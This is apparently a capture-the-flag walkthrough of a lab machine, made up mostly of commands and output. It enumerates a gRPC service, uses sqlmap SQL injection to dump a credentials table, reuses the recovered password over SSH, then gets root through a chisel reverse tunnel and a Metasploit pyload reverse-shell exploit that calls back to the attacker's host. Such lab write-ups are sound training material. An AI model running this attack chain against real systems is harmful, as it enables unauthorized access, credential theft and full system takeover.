Scan

> TARGET=10.129.227.81 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap

PORT      STATE SERVICE REASON         VERSION
22/tcp    open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
50051/tcp open  unknown syn-ack ttl 63
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port50051-TCP:V=7.93%I=7%D=5/21%Time=6469DD30%P=x86_64-pc-linux-gnu%r(N
SF:ULL,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\xff\xff\0\x0
SF:6\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0")%r(Generic
SF:Lines,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\xff\xff\0\
SF:x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0")%r(GetRe
SF:quest,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\xff\xff\0\
SF:x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0")%r(HTTPO
SF:ptions,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\xff\xff\0
SF:\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0")%r(RTSP
SF:Request,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\xff\xff\
SF:0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0")%r(RPC
SF:Check,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\xff\xff\0\
SF:x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0")%r(DNSVe
SF:rsionBindReqTCP,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\
SF:xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0
SF:")%r(DNSStatusRequestTCP,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0
SF:\x05\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\
SF:0\0\?\0\0")%r(Help,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0
SF:\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\
SF:0\0")%r(SSLSessionReq,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x0
SF:5\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0
SF:\?\0\0")%r(TerminalServerCookie,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xf
SF:f\xff\0\x05\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0
SF:\0\0\0\0\0\?\0\0")%r(TLSSessionReq,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?
SF:\xff\xff\0\x05\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x0
SF:8\0\0\0\0\0\0\?\0\0")%r(Kerberos,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\x
SF:ff\xff\0\x05\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\
SF:0\0\0\0\0\0\?\0\0")%r(SMBProgNeg,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\x
SF:ff\xff\0\x05\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\
SF:0\0\0\0\0\0\?\0\0")%r(X11Probe,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff
SF:\xff\0\x05\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\
SF:0\0\0\0\0\?\0\0");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  • Investigate port 50051, which nmap could not identify from the returned fingerprint
└─# nc -vn 10.129.227.81 50051
(UNKNOWN) [10.129.227.81] 50051 (?) open
▒?��?�� ?@Did not receive HTTP/2 settings before handshake timeout

> curl --http2 http://10.129.227.81:50051 
curl: (1) Received HTTP/0.9 when not allowed

> curl --http0.9 http://10.129.227.81:50051 -o-
▒?��?�� ?
  • Several pieces of evidence point to a gRPC server: the raw connection answers with binary HTTP/2 frames (the `\0\0\x18\x04` prefix is an HTTP/2 SETTINGS frame) and the server reports that it did not receive HTTP/2 settings. Install grpcurl and try again.
└─# ~/go/bin/grpcurl  -plaintext 10.129.227.81:50051 list 
SimpleApp
grpc.reflection.v1alpha.ServerReflection

└─# ~/go/bin/grpcurl  -plaintext 10.129.227.81:50051 list SimpleApp                                                    
SimpleApp.LoginUser
SimpleApp.RegisterUser
SimpleApp.getInfo

User: sau

  • grpcui can be used to open a web UI for the service
─# ~/go/bin/grpcui -plaintext 10.129.227.81:50051
gRPC Web UI available at http://127.0.0.1:43395/
[GFX1-]: Unrecognized feature ACCELERATED_CANVAS2D
Missing chrome or resource URL: resource://gre/modules/UpdateListener.jsm
Missing chrome or resource URL: resource://gre/modules/UpdateListener.sys.mjs
  • Register a user and log in through the web UI
# login
POST /invoke/SimpleApp.LoginUser HTTP/1.1
{"metadata":[],"data":[{"username":"test","password":"test"}]}

## response
{
  "headers": [
    {
      "name": "content-type",
      "value": "application/grpc"
    },
    {
      "name": "grpc-accept-encoding",
      "value": "identity, deflate, gzip"
    }
  ],
  "error": null,
  "responses": [
    {
      "message": {
        "message": "Your id is 645."
      },
      "isError": false
    }
  ],
  "requests": {
    "total": 1,
    "sent": 1
  },
  "trailers": [
    {
      "name": "token",
      "value": "b'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoidGVzdCIsImV4cCI6MTY4NDY3MTcxMX0.GMGXLmyShXPHP8gOU5XDkEbPgZ4b60iZIoZERfhUB3Y'"
    }
  ]
}
  • The `token` trailer returned by the login call can then be sent as a `token` metadata header when querying /invoke/SimpleApp.getInfo (strip the `b'…'` bytes wrapper shown in the trailer)
POST /invoke/SimpleApp.getInfo HTTP/1.1

{"metadata":[{"name":"token","value":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoidGVzdCIsImV4cCI6MTY4NDY3MTcxMX0.GMGXLmyShXPHP8gOU5XDkEbPgZ4b60iZIoZERfhUB3Y"}],"data":[{"id":"1"}]}


## response
{
  "headers": [
    {
      "name": "content-type",
      "value": "application/grpc"
    },
    {
      "name": "grpc-accept-encoding",
      "value": "identity, deflate, gzip"
    }
  ],
  "error": null,
  "responses": [
    {
      "message": {
        "message": "The admin is working hard to fix the issues."
      },
      "isError": false
    }
  ],
  "requests": {
    "total": 1,
    "sent": 1
  },
  "trailers": []
}
  • The getInfo response refers to an admin user; logging in as admin:admin succeeds
└─# curl http://kali:43395/invoke/SimpleApp.LoginUser -d '{"metadata":[],"data":[{"username":"admin","password":"admin"}]}' -H 'Cookie: _grpcui_csrf_token=iiqIdGFElShuDFWaLRu-scnvErn9lDNWNfTLwbjO4xE' -H 'x-grpcui-csrf-token: iiqIdGFElShuDFWaLRu-scnvErn9lDNWNfTLwbjO4xE' -H 'Content-Type: application/json'
{
  "headers": [
    {
      "name": "content-type",
      "value": "application/grpc"
    },
    {
      "name": "grpc-accept-encoding",
      "value": "identity, deflate, gzip"
    }
  ],
  "error": null,
  "responses": [
    {
      "message": {
        "message": "Your id is 863."
      },
      "isError": false
    }
  ],
  "requests": {
    "total": 1,
    "sent": 1
  },
  "trailers": [
    {
      "name": "token",
      "value": "b'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYWRtaW4iLCJleHAiOjE2ODQ2NzMxMTN9.1UjkoGoHlYgGVL99budVUjEebim1WKK0A142A8pvj4c'"
    }
  ]
}
  • The `id` field is vulnerable to SQL injection; sqlmap (with `1*` marking the injection point and the admin token supplied as metadata) dumps the SQLite database, including the accounts table
└─# sqlmap -u http://kali:43395/invoke/SimpleApp.getInfo -H 'Cookie: _grpcui_csrf_token=aaa' -H 'x-grpcui-csrf-token: aaa' -H 'Content-Type: application/json' --data '{"metadata":[{"name":"token","value":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYWRtaW4iLCJleHAiOjE2ODQ2NzQ2MTN9.6SLB2bFqdMdDHDGK3kUR3RuwqKTN8KpJpomW2eIpqX8"}],"data":[{"id":"1*"}]}' --dump

[07:22:16] [INFO] table 'SQLite_masterdb.messages' dumped to CSV file '/root/.local/share/sqlmap/output/kali/dump/SQLite_masterdb/messages.csv'
[07:22:16] [INFO] fetching columns for table 'accounts' 
[07:22:16] [INFO] fetching entries for table 'accounts'
[07:22:18] [INFO] retrieved: 'admin','admin'
[07:22:19] [INFO] retrieved: 'HereIsYourPassWord1431','sau'
  • The password recovered for sau from the accounts table is reused for the SSH account; log in as sau via SSH to get the user flag
└─# ssh sau@10.129.227.81                                                               
sau@10.129.227.81's password: 
Last login: Mon May 15 09:00:44 2023 from 10.10.14.19
sau@pc:~$ ls
user.txt
sau@pc:~$ cat user.txt 
d9c6a8eaf9a127019c2c882188355e5f

Privilege escalation (PE): root

  • Upload linpeas and look for listening ports that the external scan did not show: 127.0.0.1:8000 and 0.0.0.0:9666 appear here but not in the nmap results
[+] Active Ports
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:8000          0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:9666            0.0.0.0:*               LISTEN      -
tcp6       0      0 :::22                   :::*                    LISTEN      -
tcp6       0      0 :::50051                :::*                    LISTEN      -
  • Upload chisel and reverse-forward ports 8000 and 9666 to the attacking host so they can be reached locally
# kali
> chisel server -p 9999 --reverse

# target
> chisel client --max-retry-count=1 10.10.16.59:9999 R:8000:localhost:8000 R:9666:localhost:9666
msf6 > use exploit/linux/http/pyload_js2py_exec
msf6 exploit(linux/http/pyload_js2py_exec) > set RHOSTS 127.0.0.1
msf6 exploit(linux/http/pyload_js2py_exec) > set LHOST 10.10.16.59
msf6 exploit(linux/http/pyload_js2py_exec) > set TARGET 0
msf6 exploit(linux/http/pyload_js2py_exec) > set payload cmd/unix/reverse
msf6 exploit(linux/http/pyload_js2py_exec) > run

[*] Started reverse TCP double handler on 10.10.16.59:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Successfully tested command injection.
[*] Executing Unix Command for cmd/unix/reverse
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo NQpaM695yOwowJQe;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "NQpaM695yOwowJQe\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.16.59:4444 -> 10.129.227.81:39022) at 2023-05-21 07:45:51 -0400

shell
[*] Trying to find binary 'python' on the target machine
[-] python not found
[*] Trying to find binary 'python3' on the target machine
id
[*] Found python3 at /usr/bin/python3
[*] Using `python` to pop up an interactive shell
[*] Trying to find binary 'bash' on the target machine
[*] Found bash at /usr/bin/bash
id
uid=0(root) gid=0(root) groups=0(root)
root@pc:~/.pyload/data# cat /root/root.txt
cat /root/root.txt
954ba7074ecdb8cddb857055039e8b3b
root@pc:~/.pyload/data# 
